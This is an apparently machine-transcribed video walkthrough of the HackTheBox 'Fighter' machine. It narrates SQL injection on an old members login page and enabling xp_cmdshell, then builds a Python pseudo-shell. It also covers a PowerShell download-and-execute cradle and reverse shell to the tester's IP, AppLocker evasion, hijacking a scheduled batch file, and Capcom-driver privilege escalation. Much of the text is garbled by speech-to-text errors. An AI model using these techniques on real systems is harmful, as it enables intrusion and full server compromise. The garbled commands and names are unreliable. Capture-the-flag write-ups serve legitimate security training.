HackTheBox - Fighter
Key Takeaways
The video demonstrates a cybersecurity penetration test on a Windows 2008 R2 or 2012 R2 server using various tools such as nmap, GoBuster, and Burp Suite, and exploits SQL injection vulnerabilities to gain remote code execution and elevate privileges.
Full Transcript
what's going on YouTube this is IPSec and this is probably gonna be one of the more complex and difficult videos I've done because the Box we're doing is fighter which is really difficult it took me the better part of three or four days when this box was initially released to do it and when you explain it it doesn't sound that hood you essentially do a bunch of fuzzing on a web server find a old wing that is SQL injectable run code get PowerShell and then eventually escalate up to route with a Capcom exploit and then do some easy reversing on a binary to get the flag sounds easy but there's a bunch of things in the way like in our virus app Locker etc that just slow you down and not to mention the SQL injection is ridiculously tough to do because it requires creating your own script I don't think any like open source tools will just automatically do it because it's set up in a slightly different way to make it difficult so let's just jump in the first thing we're going to do is and map the box so and map - SC for default scripts SVO enumerate versions Oh a output all formats putting the a map directory and call it fighter then the IP address which is 10 10 10 72 just takes some time to run so I've already run it looking at the results we see only one port is open that is I is on port 80 and it's version 8.5 so this is Windows 2008 r2 you'd be just Google like Windows is versions Google should really tell you exactly what goes to it if we clicked all more rows we'd see eight five is windows oh oh it must be windows 2012 or - not 2008 that's odd I thought was the 2008 box but maybe 2012 so version of Windows unknown yet probably going to be 2012 r2 but the only way to really find out is to shell the box so let's do that by going to 10 10 10 72 and we just see Street Fighter Club website it looks like all these links go just to the anchor hashtag of pound whatever you want to call this but they're all dead links looking at the very first and now we see they're currently redesigning the website Street Fighter Club HDB so we know what the server name probably is we can go and edit our host file to add that so at C host and then Tenten 1072 Street Fighter Club htb and if we keep reading it says their old member site is still available for registered members but makes us go find the link so let's start doing that let's check robots.txt we get a 404 not found so let us start up go Buster and I am now on go Buster 2.0 because I updated Kali so you may want to do the same but we're not using any of the new functionality so we're list user share wordless doorbuster and directory list 2.3 medium text - you four URL we're going to do Street Fighter Club htb and - OH - specify the outfile go Buster - route vlog and I'm using the domain name is to have IP because generally web servers like having a host name so we do see multiple hits for images that's a 301 redirect and the reason is windows isn't case sensitive so these are all the same thing if we go to slash images it redirects us to putting a slash on the end and for three's us I'm gonna try like WP dash admin while that goes to see if was a wordpress site long shot but sometimes you just take those while go Buster is running I'm going to try to brute-force subdomains as well and to do that I'm gonna use a tool called W fuzz and we're gonna specify - W for word list user share for list I'm gonna use actually SEC list if you don't have this you can just apt install it it's in the Kali repo then discovery DNS and we're going to try let's do subdomains out of the top million would do 5,000 of them then - you I'm gonna do Street Fighter Club htb and the reason why we're not doing fuzz here is none of these subdomains for a Street Fighter club dot HT b were resolved it's just going to my verizon sandbox because I'm using Verizon's DNS servers but anyways since these dns names don't actually resolve we want to specify the I think host header field and that's - HR the lowercase or uppercase think uppercase h-help is lowercase uppercase H is to specify a header so - uppercase H fuzz dot Street Fighter club HT b if you haven't figured it out W fuzz when have you have a capital fuzz and that's what puts the item in the word list I did not like that what do we have where's the error wrong header Oh host : and let's see let us hide characters that's - H H it would be - HC to hide characters but code is - HC cell HH special would just hide words any page with 717 words on it just ignore and we get members comes back right away that has 92 words so let us go into our I should have killed that but that's the one I'm just killed it so some of the resources on my VM frees up so it's not going slow going to Etsy host let's do members dot Street Fighter Club HT be and we can try it in Firefox see what happens we do get a 4:3 so let's go back to go Buster kill this and now we want to try brute force saying members dot Street Fighter Club htb and go Buster or do sub-domain members at / old redirects us so let's see what is at / old access denied so it looks like now we have to brute-force a login page or another page within / old a lot of brute-forcing right now going on so let us find a good word list going back into cyclists let's do discovery web content Sony logins dot flood text let's try that so copy this URL and we will go Buster - W - you is gonna be members Street Fighter Club HT b / old and then we want to specify - / out file go Buster login old I guess dot text try this and right away we get login ASP comes back with two hundred so let's try old login dot ASP welcome to the members area finally we have made it here so let's just try like admin admin and nothing so let's switch over to huh so we can intercept this request intercept is on try let's see see what this does so we did change login type and check to remember me click go go back into burp just send this a repeater forward along and then we'll try it with those unchecked and then and then send this send this repeater so all we're doing is comparing two requests so we have username admin password admin walking type equals two and this was with user so login type 2 is probably user b1 equals login let's check this one we have admin admin long and type one remember me as on and b1 is login so if we click go and click go here let's see don't really notice a big difference between these two requests change log and type tou1 and nope don't really notice anything both the time we're telling us to set cookies and just saying the object moved so in let's follow redirection on both of them I'm trying to find out what the difference between the two requests is so it's saying it moved again and it moved again so 2017 bytes on that one 2017 bytes on this one looks like they're relatively the same but because this one has just more options I'm always going to do the one with remember me that's unset that let's try admin admin click remember me send this droid Peter and we can close that one and let's just fuzz this so admin plus or one equals one nothing there let's try login type is equal to three nothing there put junk and login type and we get a error of five hundred let's put a SQL comment which is - - and then a space I always do the second - just so you know there's a space and we get a 301 so if we put random junk after the comment and then before the comment and we get another error message so we can be relatively certain that it processed this comment so let's try 3 or 1 equals 1 click go and if you're really paying attention you'll see that an email comes back if we change this to a false statement no email have you just tried this you get no email so through a boolean injection we have changed this to say hey if 1 equals 1 it's a valid login let us in and it returns something back in the email so let us go to the decoder tab decode the URL encoding then on base 64 this and we'll get the email but more importantly let's just follow the redirection and then we get an error service is not available but I'm looking at level 1 see what level is so decoder smart decode negative 1 so let's try changing level 2 I don't know one and not negative one repeater one pausing the level level 2 level 3 so I'm guessing level is probably going to be user or admin and I'm just playing with this to see if service ever becomes available and we probably have to be 64 encode this since everything else is so go to tab encode be 64 and then we probably want to encode as a URL go back to repeater and what level is put this in and we always get service is not available so we can assume this page is down but we got a SQL injection so let's go back and where SQL request is and try getting figure adding getting information from this database so let's try a union select one error message to here 3 4 5 6 and we get it valid here so let's see what this email is go to decoder 5 smart decode then decode base64 5 so anything we place here please subscribe we have two he will encode that now close out the quotes let's try different quotes don't like double quotes for whatever reason we placed a string and filled five if we decode this we get that string so let's try figuring out what type of database this is at version a sequel command got a bunch of information here go back to the coda tab smart echo decode as base 64 and we have Microsoft sequel server 2014 Express edition so we know this is a Microsoft sequel server Microsoft sequel is normally vulnerable to stacked queries generally I went to like net sparker SQL injection cheat sheet and this is a relatively decent reference so if we go to this URL they have tons of information but when stacked queries work and we have ASP SQL Server green showing it does work so let's see exactly what that is we go back to repeater we can do like select one and the query works if that select statement is not valid we can air message so we can actually chain multiple SQL queries which is going to be handy because that will allow us to do things like an able XP CMD shell if we wanted to we could probably test if XP CMD shell was enabled let's see test XP CMD shell an able check query maybe that's it let's see this may work so if we do long and tight and then Union select one two three four piece this will see if it works I'm just making all these double spaces a single space and showing there's no like tabs in this query does these spaces looked odd to me just from eyeballing it okay maybe this will work maybe it won't maybe it will maybe it won't copy that paste it in field five add a field six and we will highlight this press control you to URL encode it click go and we get an error message let's see good to put this in double quotes was it single quotes didn't like a double quotes it didn't like still an error message C can incur that anymore let's make sure we didn't have any errors here so on your land code this select convert in is normal value values config value huh and it looks correct let's see and look at this one more time and then we'll just move on and assume it's not enable because I don't think it's enabled by default and you normally have to enable it with the stacked query so let's see maybe it doesn't like this semicolon here because it could be like viewed as a stack query so let's you know one code it click go let's remove this set 3 B click go and we notice something different and the header so we have that semicolon there it only gives us check back without it we get level pass for a name so we just we know we did something because we made it further than script because the script is now giving us more output generally more means you made it further than the code so let's try putting this in double quotes to see if it likes double quotes instead no it does not so move that go back we're still getting an error message so let's just try one last thing and change the case on this just in case it has a bad blacklist blocking xB CMD shell that is all lowercase and it looks like it does because now we take an error message and we get email back so if we smoke decode decode base64 we get one which I believe means XP CMD shell is enabled and we want to run the commands to enable it just in case because I don't think it's supposed to be enabled by default maybe it is maybe it isn't but we will run those commands to enable it so this window can be called check enabled I guess and would always have that saved so the next thing we do is we want to configure a stacked query to enable xp CMD shell so to do that let us just run a different command and as I did that I realized I just over wrote the window I tried to save checking of its enable is not important so we'll just disregard that for the rest of the video and we'll have enable RCE as this tab but the command to do this is let's see we want to execute SP configure show Advanced Options set that to 1 then we want to exec SP configure xp CMD shell and set that to 1 then we just want to reconfigure so let's see exec SP configure show Advanced Options 1 exec XP SP configure yeah that XP CMD show 1 that should be good click go object is moved so we have now just enabled the XP CMD shell it was already enabled but we did it again for good measure I'm not sure if you'll have to or not I'm not sure why it was the next thing we do is now run commands so run command and we can just simply do exec SP was not exactly XP CMD shell Who am I sorry this this error it does not we don't get any output we can try like paying one 27001 and I was just saying if it would take longer to come back so I'm not sure if this is threaded or not and what I mean by is when I run this paying I'm not sure if the request is going to wait for all these to come back before it responds with a webpage what I do know is it likes double quotes not single quotes that it definitely likes so let's see let's try creating a table and then outputting the results of XP C and B shell in a table so we can do create table if SEC and then we want to say the columns output and remember the syntax for this my apologies think I'll put verkehr 9001 maybe it's probably will error out yeah so let's do a nice SQL create table C create table employees d-nut all lost name so almost same print see try this see let's undo all and code this so I can see what all their special characters are great table if SEC output verkehr 9001 great table employees first-name verkehr 50 should work let's try this again go until error see let's just try shrinking for a care maybe you don't always want to be above 9000 so won't try 1024 that sounds like easy to visible number for ver care that's relatively small try that and there we go so knows the issue when you just add it being too big so now we should be able to insert XP command inject into this table so we can do that let's see I was still in wrong command so let's rename this to create table create a new one and run command so let's see we want to do insert into hip sack output and we want to insert the contents of XP CMD show and then we'll do good way by okay you're all encode this click go looks like it ran and now let's get the output so remember we have to do a union injection to get stuff out of the database so 3 Union select 1 2 3 4 5 6 comment for good measure I don't think we have to do these comments but whenever i SQ I'll inject and add things I normally put a comment at the end so we want to do select top one from output where output is not null there we go click go and that did not work go ahead specify if sector output nope let's see let's get rid of this and dumb it down so select can we do count start from output no it does not like that go after you I'll encode any of this no I do not let's see-oh select count output from hip sack and there we go so we have decode smart to code code as a 64 one because we ran a command we have one line of output so that's exactly what we would expect so we select output from MIPS ik select top one output there we go I always do top one when I'm doing this just to grab one line without that it's grabbing multiple lines and that is bad page 64 we have fighter / SQL serve so now we can do let's another command let's try like go back to our own command and dry IP config IP config click go get the output and what kind of stuck because it's still giving us the same exact output as before which was the email and try like order by descending click go did not like that ascending click go do not like that at all but we have to create like a auto incrementing primary key so we can easily pick which entries to do because if we look we do that count again count output we have multiple lines to go through and this is looking a bit bigger so decode this base64 we know have 10 lines in this we only ran two commands and the reason is it's taking every line and that ipconfig and inserting it into the database so let us drop it sec so if we see a new one let's just we have to do the stack query drop tables if sec I don't have its table at tables table probably makes sense there we go so we drop dip sec and we can go back to the create and now we want to create one with a primary key whoops w elenco to that my bad so we do ID is an integer the identity is going to be one for the scene start at one increment by one and we call this primary key put a comma and hope I just did that correctly click go looks good if we run ipconfig that looks good get output count oq let's just change this oq decode a 64 pi needs to equals 9 so we have 9 lines of output so we can do select output from if SEC where ID is equal to 1 see if that works well we don't like count there's my select output where ID is equal to 2 there we go so maybe one was null it just couldn't be viewed decode this and we get Windows IP configuration so if we increment this to 3 or probably get the next line doesn't like that try for doesn't like that 5 there we go we got one so very temperamental but looks like we're getting that Ethernet adapter Ethernet 0 so this is gonna be painful to do manually keep doing it manually so let us go and create a script to do this because I think we have everything we need to create a script so let's go back and we will make SQL inject and we will V notes I want to do notes on this side and V and Jack PI on this side this way over because this script is going to get a little confusing if we don't lay it out correctly so let us begin typing what we want to do the very first piece being what modules we want to load so let's see to execute the exploit we need to make a post request so we want through a quest module to make post then what else do we need well we need to be able to read the cookie because that's where the output is and that will require base64 specifically be 64 decode to read the cookie and then also will need a way to undo URL encoding and that can be done in your lib parse unquote so there's the probably the modules will need the very first thing we wanted our script to do is enable RCE mode and this will do enable xp CMD shell this rule only requires us to make a post request we want to create a table so we can store our output and this is going to require a post request as well the next thing we want a script to be able to do is well run commands so we need a way to run XP CMD shell and that's going to require post and this inserts multiple rows as a note to us we also probably should in truncate the table every time we run a command we didn't show that in book but if we're going to like loop through the table and echo everything in the table we need to erase the table as we run it or will show previous command history or we have to keep track of where we left off in the table and no one wants to do that so that will require a post as well and I'm actually going to move this above XP CMD shell because we want to do it before you run a command then let's see we got to get out put some hell so get output and that's going to require us to get the number of rows and that requires post and it's also going to require standard out or something to read that cookie because we actually are interacting with the server and then we want to print each line and that's also going to require a post and STD el and STD out I guess we can define that to be the email cookie and that does a URL in code and then a b64 in code so that's essentially our script and those are the things we have to keep in mind so string it to models I'm going to import requests because we know we need that gonna import Base 6000 do from base64 import be 64 decode from URL Lib purse import unquote and now we want to create a class to stay organized and when this initializes we want to set proxies is equal to one 27001 8080 and the only reason I'm doing that is we're probably going to do a lot of debugging or maybe you won't but this allows us to do debugging because it's going to put our script through a proxy in the future so self dot URL we're going to declare that to be HTTP members dot Street Fighter club HT b / old we're posting to verify dot asp now self proxies is equal to http or do this in single quotes proxies now we have to start creating all the SQL injections so self can able XP shell is equal to one and let's copy this Mabel RCE paste that and then we'll do I think we want space there I don't know if it matters okay [Music] for posterity will capitalize that okay why don't our o go back okay that's weird let's just print self dot an able XP shelled I do that correctly and we'll call this o for object I guess is equal to fighter by its on three and jacked up pie and I guess it works if it likes a lot of white space I wonder that's gonna screw us up if it does we can always fix it but I think for code readability sake right now I like that so next thing we want to do is let's see we just did XP CMD shell so we have to create table so self dot create table is equal to its another stacked query do I have it here create table on your Ln quote copy paste and we'll do create table if sac that there that there and that that looks good next thing we want to do is self dot I guess we can truncate the table real quick and I haven't showed that command but it's relatively straightforward at truncate table hip sack it's easy so let's do self dot can we get command I think that may be it for all we can statically display so let's go through this we got XP CMD shell we got table I got truncate come and I don't want to do this way because it requires us to do dynamic output so we'll do that later so number of rows it will require a dynamic output or dynamic when I say dynamic out but I mean dynamic input because we're actually changing something this all here is completely static so that should be good for the initialization of this class so we can now create other functions so the very first thing we have to do is a function to make a request because posting is quite a common thing we have to do so def make requests a definition make requests itself and then every request is going to do something and we'll call that we'll call that action and all that's gonna do is return request post self dot URL which is going to be member Street Fighter club whatever proxies is equal to self dot proxies we don't want redirects because every time it does this we're doing object moves and we don't want to follow that all we want is to get that cookie immediately let's see the data can be username admin password please subscribe login type this will be action because that's where the inject is and then remember May at that on and the last one is b1 b1 is set to login okay that looks good I think I forgot a single quote somewhere because I don't remember this being read before we started that's coming out this yeah that was white so we screwed something up let's see user admin password please right here is where it starts going white what says on there we go so the next thing we want to do is probably run commands we just can make a request so yeah let's code the wrong command piece CMD and we're just going down so enables RCE mood almost all done all the injects are there we just have to make the requests actually let's do that on the initialization let's do setting X boy and we can just do self make request cell and the action is going to be self dot enable XP shell and the next one is going to be self dot create table okay this done it should be able to close that one all l so run CMD very first thing we do is truncate the table according to this so self dot make request self truncate table okay then the next thing we do is self dot make requests and I don't know what exactly what that F means but it makes these a lot more readable and Python three because I can specify commands that way instead of doing like that percent s and then percent at the end or dot format I can just put the command I want in its weekly brackets so there's gonna be one insert into if SEC output exec XP CMD shell and then single quote CMD single quote I think that's good and because we're putting X P CMD shell in single quotes I'm also going to do CMD is equal to CM d dot replace single quote with double single quotes so this way and for a command that we're running has a single quote it's kind of put two single quotes which is kind of like the escape for a single quote and just puts a single quote if that makes sense hopefully it does and now we need a way to get output because the command is ran so let's do def get output actually output is gonna require us to read cookies so let's do def decode cookies self cookies and we'll return be 64 decode unquote to undo HTML encoding cookies email okay so now we can carry an output function so def get output on self and we're almost done so we're actually going to get through the post request back so I'm going R equals self make request self dot whoo we don't have something to get the count so we'll call this get index and we have to create a new query here to get the number of rows so self dot get index is equal to 1 what is that Union select 1 2 3 4 5 6 and then we can do a comment for good measure and this was select will do top 1 ID from hips ik so that's going to select I think the very last row if it doesn't now we can put it order by descending what so output should now be able to get the number of lines so we can do count is equal to int because this needs to be a integer self decode cookies and r dot cookies so there's gonna be the whole request and this is only going to send the cookies the cookies piece so now I should be able to do 4x and range of 1 to count because it's going to be the max line is equal to self dot make request then f1 Union select one two three four five six and that okay and in five we need to select top one output from ape SEC where I D is equal to X and then we end that nested query yeah I think when you run a query within a query it's called nested when you run it outside its stacked if you're wanting about terminology I'm using and then we'll try output is equal to self decode cookie blind dot cookies so line is the whole request again just like when we did count and I'm sending the cookies piece to decode cookies and then when we do print output decode and if we fail do nothing so now on run command we can now specify we want to self get output and we can finally do the last piece which is run this so while true we do please work is equal to input shell and then run CMD please work I think that's it because this will kick off run CMD which will insert a stuff into the table and that's gonna kick off get output automatically which is going to try to print out the results there's no way this works but it's worth a shot Python 3 inject app I make requests to arguments but three were given line 22 self dot make request what inject why would three given that should just be one self dot enable XP shell if we put this to one line I do that incorrectly that going to move the error do not move the error print self dot an able XP shell one exact that looks good what is going on here there's a stupid mistake somewhere does it happen on all of them the next one yeah run CMD is not find 53 Oh dot run CMD doesn't look like this works at all simply going for Oh intercepts on history so let's see who am i we can see the response object moved and email let's see I should put something in like the header of the request that said where each piece was so we're starting at 13 let's run Who am I does 14 this is the truncate table that did not error and sit into Apes ACK Who am I that's good now let's see what this says it's like one two three four top one ID from apes ACK if we run this look at email we probably get one ok so then it does let's see Fred Cal do i do 4x and range 0 Cal see if my decode cookies is working Who am I one okay see mine is equal to select top one output from if sec I don't remember seeing that command select one that's top one ID so let's see I put this in 0 2 count Who am I let's do count plus one top one output from ape SEC that's looking better let's see what this says so select top one output from apes ACK where ID is equal to one click go make it email and this should be decode base64 fight or SQL serve so that is correct I think we have an error and this cookie thing and I only had decode cookie not decode cookies Who am I there we go IP config didn't work for that Who am I IP config doesn't work for multi-line that is bizarre whoever might work Stella Lee let's do system version dir so it's not incrementing so let's see right count Python 3 Who am I is one-line IP config is one line that shouldn't be the case that should be 9 so get indexes crew table select top 1 ID from hip SEC and go figure this is the one we didn't do invert so let's see what this looks like repeater paste nope this was well just type it because VI is going in visual mode and doesn't want to copy to my real clipboard so select top 1 ID from ape SEC 1 Union select 1 2 3 4 5 6 select top 1 ID from hip SEC it's probably capital Oh always takes longer for the video that does to actually do it click go and that's just one right it didn't actually do what we thought it would do with that IP config so run CMD that is bizarre go to burp proxy we need to actually just filter for IP config C and a repeater run command so we have the output there let's send this one and see what we did differently between these two okay well this has cookies in it we don't need let's just actually copy well one that works down here and put the injector on its own line it's going to be some silly mistake control shift deal control shift key Oh insert into if sec output we have double quotes here and single quotes here does that actually change the output that much so if we run this we'll probably be at ten to one we want ID not output ID from ape SEC and we don't need where IDs so select top one ID from ape SEC click go and this is still just one let's see if we order by descending did not like that I think what a byte is one word did not like that order by ID descending there we go I think that's it the one we didn't test fully is the one that gave us the most issues spot decode 3d decode as base64 six so let us change command truncate table get index and this will be order by ID descending ipconfig there we go that's what I expected so I was just grabbing the well it was doing exactly what it said it was grabbing the top row from ID which is always going to be one because that's the very top by order by descending order it's going to grab the bottom and what if I need that count plus one now let's see P config there we go that is looking much better so I still wonder why this Airedale self create table make requests takes two positional arguments but three were given oh crap that there we go Who am I works and now let's see IP config system info let's good take a little while to run but now we have a actual working SQL shell sorry that took so long to get working but we answered the question we had at like minute 1 and it's 2012 r2 so the iOS version does not lie apparently my memory does but we have completed all these tasks I got output and we got standard out so essentially the program we define a bunch of SQL injections we set up the server so we can enable X P command shell and create the table where we output our input our standard out - I guess that's the best way to do it we create a function so we don't have to put this data cookie a bunch of times so we just create a wrapper around making a post request then we issue a XP command shell command and insert into the table we had created and after that runs we do get output which then grabs the number of rows we have then loop through and prints every single line and it can do that because the very first thing we do and run CMD is truncate the table which means erase table so that is that piece we are almost to the user shell but that this is where the box starts getting fun so hopefully you enjoyed coding this pseudo shell we can begin doing the Box now sure I'll save this except that actually there was one last thing I wanted to do and that is make sure that script to work after a reboot so I reverted the box and we're gonna try running the script again I do Who am I it actually did not work so some of our get the box ready for exploit doesn't work in the script so what I'm gonna do is go in the book go into HTTP history and see what we send so this is the get output command we got a 500 error this is XP CMD shell it actually runs so that's odd if we keep going down is the truncate table that says it ran create table we get a 500 error and then this is setting up XP CMD shell to be enabled and that runs so this create table that's a little worrisome did it fail because the table didn't wasn't created to begin with or is there an actual error in this SQL if we look at this we can see it doesn't end with a parenthesis so going back to inject pie where it's a bit easier to read good we open it up here and never close it so let's put a last pregnancy to close it run this no AMI and there we go now the script is working and we can jump in to trying to pop this box and there are two ways to do this I'm gonna do it the intent way first and then the second way I'm going to do it the unintended way I guess we can say um first thing I do is who am i / prove and we see we have the SC impersonation privilege and it's enabled and this is going into the unattended way with juicy potato juicy potato has to be used because bits is blocked which prevents rotten potato and all the previous ones from working you just specify a different clsid that doesn't make sense hopefully it will when we get to this box so the first thing I want to do is try to get away from this pseudo show and get a real shell because I hate not having like current working directory and hate having specified full paths every time someone do PowerShell know am I gonna get access is denied so if you remember there are two versions of PowerShell a 64 bit and a 32 bit when I just type PowerShell I think it's going to C colon backslash Windows Bachelor is native or system 32 it's going to one of those and that is the 64 bit locations if we specify C colon backslash windows backslash this whoa 64 backslash windows powershell v 1.0 powershell Who am I this one actually runs this is the 32 bit version so when I was trying to empower shell and get access to now I'm like okay app lock is on the box or something is configured to prevent PowerShell okay let's try the other version because maybe they just blacklisted power to the 64 bit version if they specified the path weird or something and it looks like that's what happened because the 32 bit works so let us get a reverse shell with this so if we do see : windows this Wow 64 windows powershell be 1.0 powershell then we can do I X new object net dot web client download string HTTP 10 10 14 i think i'm 3 if config ton 0 yes I am 3 then clean dot ps1 I will do Rev dot ps1 name really doesn't matter so we have to make that file exists make the dub dub dub CDW dub and then we'll copy opt nishang shells invoke powershell tcp ps1 and copy it to rev ps1 then when we edit this we want to take this example and invoke it soon as it runs just to save us running a command so 10 10 14 3 port will do 4 4 3 back at LV mp443 run this doesn't look like it ran so let's see unable to connect to the remote server oh of course CDW dub python simple HTTP server 80 and we now can run this remote server returned 404 not found because this is expecting all caps so we can move to rev ps1 run this one last time and we get a connect back so if we do Who am I we are still the fighter slash SQL server and um we're in the 32-bit version of PowerShell so our next task is trying to escape this so I'm going to go into the decoders user folder and I made a typo CD users decoder do a dir here and we see there is a clean bat the reason I was going in here is because this is where user dot text is then we get access to path to this denied but seeing cleaned up bad sod if we look we see a command to remove C colon users decoder AppData local temp so it's removing his temp directory if we look a nap data local we don't have permission so we just have to go on a hunch that this is the next step of the box if you didn't want to go this route there are plenty of like app Locker bypasses using powerless shell and msbuild to run payloads and maybe we'll do that at the end of the video but that's not the app Walker bypass I plan on using for the unintended method so we're gonna keep going with the intended method and notice that cleaned up bat has an a so it's in append only we don't have write access we can't you'd raise the file so if we just do like echo test to cleaned out that immediate access to path is designed if we do echo test double to cleaned up that it writes and we can view the file and see that we did it the issue is there is an exit so that sucks because if there's an exit all this stuff below it won't run we can however truncate with the pen permissions so if we do system IO file open see : users Dakota cleaned up at system IO file mode to truncate we can now see we have erased the file and I guess I command me have something weird where I didn't close the file weird I don't know how to fix that eggsy Rochelle and run it again maybe that will fix it CD users Dakota type clean dot bat okay now that file isn't being held open so I can view it and it's empty so the next step is to do the PowerShell - Bob - see ix see I'm doing this correct yeah C colon backslash users Dakota cleaned up that notice I did a single quote twice because that's how you do a single quote when going too fast powershell new object net dot web client download string now I can do the double single quote because we already have a single quote back here so double single quote to escape that essentially and 10 10 14 3 we called it Rev will do Rev - 4 4 5 . ps1 think that is all good right activist the command looks good so let's try echoing this into clean bat cleaned up bet let's copy we have to go into dub dub dub copy Rev ps1 - Rev 4 4 5 . ps1 edit this go to the bottom change the port netcat ovm p4 4 5 and here we wait and if we do it correctly we'll get a callback on our web server if not then we have to try again and see what we did wrong so it's been a while and we never got a call back so let's just bring it back this file to a box and see if we added any weird bytes to it because if we just view it with type cleaned out that everything looks fine so let's see if there's anything hidden in it in order to do that we have to convert it to base64 so we'll do text is equal to get content clean dot that if we look at text we got that so we can do bytes is equal to system dot text dot and coding unicode dot get bytes texts then encoded text is equal to convert to base64 string and bytes encoded text and let's see we write host encoded text see how do we display the actual text this one's new they do something wrong to base64 string bites and bites has text in it huh let's just try a different way to encode this because I'm pretty sure that encoded text should just give me text and don't see any property here that would be relevant to what we want so we do di yoga we can do search util - encode clean bat and we can specify a place we can write to see : users SQL serve is a username and we'll just right to test so if we use type we probably can view this file there we go copy this string go on to fighter be clean pad be 64 paste the string base64 - d2 cleaned-up bat and everything looks fine if we do xxd we can see there is junk before powershell so it's pudding i don't know what bite that is but it's certainly not what we want so we could try doing like icon - f ascii - tea utf-16 and specify cleaned up bat does that do it illegal input sequence at position zero I'm thinking there's something bad with that bite so maybe was the truncate or something but something had screwed with a text file so let us try a copy /y so we always answer yes null we're copying nothing to cleaned up that position prima can't be found that accepts argument CMD / C and we'll try this way copy / Y and all cleaned out that there we go so that's another way to clean it and it's zero in length so if we did that PowerShell trick again or echo trick again - right - cleaned up bat we're having an issue but we found out we can just use copy to overwrite this file so let us use suit util to put a file on the box and then copy it over top of it so let's go back here go in dub dub dub we can VI we'll call it mantra dot ps1 and what we want is PowerShell IX new object net dot web client download string HTTP 10 10 14 3 Rev - 4 4 5 ps1 cat this file reread it make sure it looks good does look good and we can use suit your tool to also drop files on this so so util - URL cache - blip - F URL 10 10 14 3 / record it launch IPS 1 and we want to drop it to see : users SQL serve launcher dot ps1 access is dried so let's try getting rid of the extension because of I guess app block or something and now we completed so let's copy / cmd.exe to get out of PowerShell / C copy that always answer yes launcher to clean fat will pardon specify the whole file path users decoder cleaned up that access is denied see cmd.exe /c I guess we can I guess when you copied null to a file it um truncate set instead I don't know let's try tight so if we type this file to print it out and then direct that output to see : users Dakota cleaned up that do a dir it looks like it worked and it's a hundred eighty six in length and not two hundred something it was before so it's looking better and we just is that from now thirty eight sixteen thirty eight twenty five it may have already started grabbing it we may hit that minute like perfectly know that oh no it would be getting four four five this is cert util so you told just grabs it multiple times I guess that's odd so we're just now waiting to see if it now will call back hit this and then we'll get a shell hopefully so let the waiting continue and it's been a while and we still haven't got a shell so let us try something a little bit different and just look at how long I launched a file file is so dir launcher it's 91 and cleaned up at is a hundred and eighty six so we got some weird is she going on I'm guessing it's the whole PowerShell likes utf-16 I think it is so let's copy why and all to see : users decoder cleaned up that cmd.exe fresh C copy why and all C : users could clean dot that access is denied awesome let's try it again so let's copy maybe we hit it when the computer was accessing it access denied still exit let's go back to a sequel server based on three inject let's get another shell and I'm not listening there we go and we can try that copy again because maybe a command prompt added open so cm be /c copy / yes null c colon users decoder cleaned up that there we go so looks like we just had the file open somehow C colon users decoder okay it's empty so we look at the last time we did the directing to file we let PowerShell handle it so let's do it all within that cmd.exe to see if it doesn't go to UTS 16 format I'm guessing that's what's happening cleaned up bad try it this way yah yah 91 91 bytes that looks a little bit better I think we may finally have this so let's give it some time and see if it will give us a call back we can just type it to make sure it is still what we think it is and it is we get a call back to rev four four five and we don't get a shell so either decoder is also prevented from running PowerShell on 64-bit or there's a firewall blocking for five so what I'm going to do is let's go into a dub dub dub directory go in and inject CD dot dot dub dub dub go into launcher and we're just going to call rev ps1 and wait so revved up ps1 is going on port 443 which we know can go out of the firewall so I'm just doing this to eliminate the possibility of that being the issue and I'm not sure why it just called rev for four or five again it should have called rev ps1 cat launcher download string Rev dot crap I know it just happened we only do have launched it and copied it to clean dot bat so let's move rev four four five and be lazy and just change this to port 443 and now we'll wait on the next callback to see if anything happens so we have a another shell so let's see if it's 64-bit and the reason I keep harping on this because it's technically in sandbox if it's 32-bit and some things just don't work as expected so if we do environment is 64-bit process it returns true so we know we are in a 64-bit version of PowerShell the next thing to do and this is a big leap but because of all the Street Fighter reference I remember there being like a Capcom driver bug that people called a rootkit so I'm going to look at the drivers installed I'm gonna do a command called driver query and we're going to see if Capcom driver is installed so going up and see and we stopped right on it so the Capcom module is installed so this should be a good brave ask I'm not gonna go into the press because there's already too many good videos that are over an hour long just going on this my favorite is fuzzy security Capcom let's see this is by beef or fuzzy security he has a lot of good videos on going over his process of hacking this and if you like that video go over to his patreon and if you subscribe he does maybe a video I forget the frequency of his videos but all his videos are really good so definitely you want to become a patreon to him if you like the videos here and it's not too advanced if this is too advanced for you you may want to do some learning before you start giving money for the videos because it doesn't assume zero level knowledge it seems you have some knowledge and some coding but highly recommend reading this blog post thoroughly and watching the videos and if you like the videos subscribing to them enough of that let's just pop this so if we just do github if I is a link to github here github capcom root kit is available on github awesome so let's clone this and we can let's go to a directory where we can write who are we we're Dakota ok users Dakota and what do I want to do I want to get a file on the box so go up a directory get clone paste this go into this and we noticed there's a lot of files here we do find dot grep ps1 what we can do - exact or not exact name stirred-up ps1 same thing and the unfortunate thing about this is some files don't have a line break at the very end so we can't just combine them into one file by doing something like exact cat because if we less this and we'll probably see some functions like this but it ends on a curly brace and then goes into a function name which isn't powershell it'll fail so what we have to do is we do a for loop so the reason I'm doing this is because I don't want to upload all these files onto the box I just want to create one big ps1 file so for I and fine name dot ps1 do echo I okay it echoes all the files so now we can cap the file echo nothing to put a line break and then we can call this dot dot slash dub dub dub capcom dot ps1 so let's look at this everything or that function now is good we have to get that file onto this box so I won't see you suit you till again to just download it your l cache split HTTP 10 10 14 3 Capcom dot PS 1 & 2 what to say Capcom dot ps1 download it and we are denied that's weird let us just try Capcom maybe app Locker isn't fully bypassed and we still can't write ps1 completed successfully so we can get content Capcom ps1 we want to assign that to a variable I'll just do X is equal to get content Capcom ps1 cannot find X is equal to get content Capcom there we go and I can't print that dir here Capcom exists let's just try IX get content Capcom cannot convert system object to type let's see how can we load this if we do X trying to think right now we should be able to just just type Capcom is not registered and one of this to that dot backslash Capcom actually loaded it into my memory space so Capcom elevate PID is the function we want to run that's in this Capcom type ps1 script and no it did not so let's see let's just do a IX new object net dot web client download string I don't know why I didn't do this in the first place HTTP 10 10 14 3 Capcom dot ps1 there we go it went hit a webserver loaded Capcom did ie X put it into memory we are good now so if we do Capcom - elevate PID duplicating system token and assign the system token to a current shell because if we do Who am I we were anti-authority system so now we can finally go into the administrator directory go to desktop root if we do a dir oh it's root exe so we're not even done with the box yet we still have another challenge to do and that is all this reversing to get this root dot exe working so just when you thought you had done the box brings you back i
Original Description
00:00:55 - Begin of Recon Nmap, Identify OS Version, Check out Page to find hostname is streetfighterclub.htb.
00:02:53 - Using GoBuster and WFUZZ to identify: members.streetfighterclub.htb and members.streetfighterclub.htb/old/login.asp
00:08:45 - Begin poking around the members.streetfighterclub.htb page - Find SQL Injection
